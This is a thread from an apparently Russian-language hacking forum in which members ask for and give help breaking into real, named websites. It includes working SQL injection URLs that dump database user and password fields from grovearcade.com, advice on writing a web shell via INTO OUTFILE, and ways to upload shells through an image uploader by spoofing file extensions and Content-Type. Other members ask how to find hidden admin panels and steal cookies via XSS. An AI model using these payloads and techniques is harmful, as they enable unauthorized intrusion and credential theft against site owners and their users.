Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. tend

    tend Banned

    Joined:
    15 May 2010
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    http://feel3.lviv.ua/catalog/index.php?cPath=-1+'

    Помогите роскрутить скул
     
  2. dr0wzee

    dr0wzee New Member

    Joined:
    25 Jun 2010
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Здесь походу, is_numeric().
     
    1 person likes this.
  3. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Если order by пропускает, то точно не is_numeric()
     
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://uralpress.ru/admin
    как только перехожу по ссылке сразу редиректит на главнуююю...как попасть в админку?)
     
  5. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    А с чего ты взял что это и есть админка, она может быть по другому пути
    и точто в роботс написано что /admin/
    это еще не значит что но там и есть
     
    #13965 xa-xa89, 5 Jul 2010
    Last edited: 5 Jul 2010
  6. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Прошу помочь реальную админку=)
     
  7. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Вообще вот она - http://uralpress.ru/admin/phpmyadmin/index.php
    Но как я понял там прав не хватает чтоле)
     
  8. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    ZARO, это пхпмай админ, а мне нужна просто админка, чтобы в панель администратора попасть)
     
  9. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
     
    #13969 FlaktW, 5 Jul 2010
    Last edited: 6 Jul 2010
  10. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    есть возможность провести XSS, но есть одна проблема, фильтруется + (из-за magic_quotes), как провести кражу куков если фильтруется + ? (точнее не фильтруется, а заменяется на пробел) пробывал подставлять %2B
     
  11. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    а кто подскажет как залить шелл через tiny_mce редактор?
     
  12. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Попробуй через загрузку картинок.
    Я заливал так:
    123.gif.php

    Там идет фильтрация кривая, не поможет, попробуй поменять.
    Например:
    123.php.gifs

    Или если ооочень повезет, заливай .htaccess с содержимым:
    , а затем сам шел переименовый в 123.gif
     
  13. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    спасибо попробовал, ни один из вариантов не подошёл
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    Залей просто картинку, посмотри отправляемые пакеты. Смотрим что-то вроде Content-type: image/gif . Потом залей файл shell.gif.php (сам шелл или нужный файл), перехвати пакеты через Temper Data. Найди строку с Content-type: text или как-то так будет и замени на Content-type: image/gif
     
  15. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    есть скуль на mssql. просмотрел таблицы, нашёл "admin". в ней столбцы типа id, name...
    делаю запрос
    Code:
    http://site.com/site.asp?ID=-1+UNION+ALL+SELECT+1,id+from+admin--
    получаю ошибку [ODBC SQL Server Driver][SQL Server]Invalid object name 'admin'.
    в чём дело? таблица точно существует.
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    может быть другая база, Смотри имя базы

    а потом select tra,la,la+from+schema.table

    хотя на mssql не проверил
     
    _________________________
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    вот скуль, которая нормально выводит таблици
    но когда заглядываеш в сами таблици ничего не выводит
    при таком запросе ничего не выводит, в чем может быть проблема?
     
    _________________________
  18. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    На этом сайте не 1 бд. Когда их более 1 нужно указывать откуды выводишь данные.

    Вот будет правильно:

    Code:
    http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,concat_ws(0x3a,user,password)%20,5,6,7,8,9,0,11,12+from+mysql.user--
     
    #13978 ZARO, 6 Jul 2010
    Last edited: 6 Jul 2010
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserName,Password)+FROM+grovearcade.accounts+LIMIT+0,1),5,6,7,8,9,10,11,12--

    и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь

    путь /var/www/html

    также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл....
    http://www.grovearcade.com/manager

    думаю что шелл практически у тебя в руках..ну и раз выложил сюда скулю..то скоро там шеллов как граблей на огороде будет
     
    #13979 Gorev, 6 Jul 2010
    Last edited: 6 Jul 2010
    2 people like this.
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Через эту скулю шелл не зальётся, она ковычки не экранирует.
     
Thread Status:
Not open for further replies.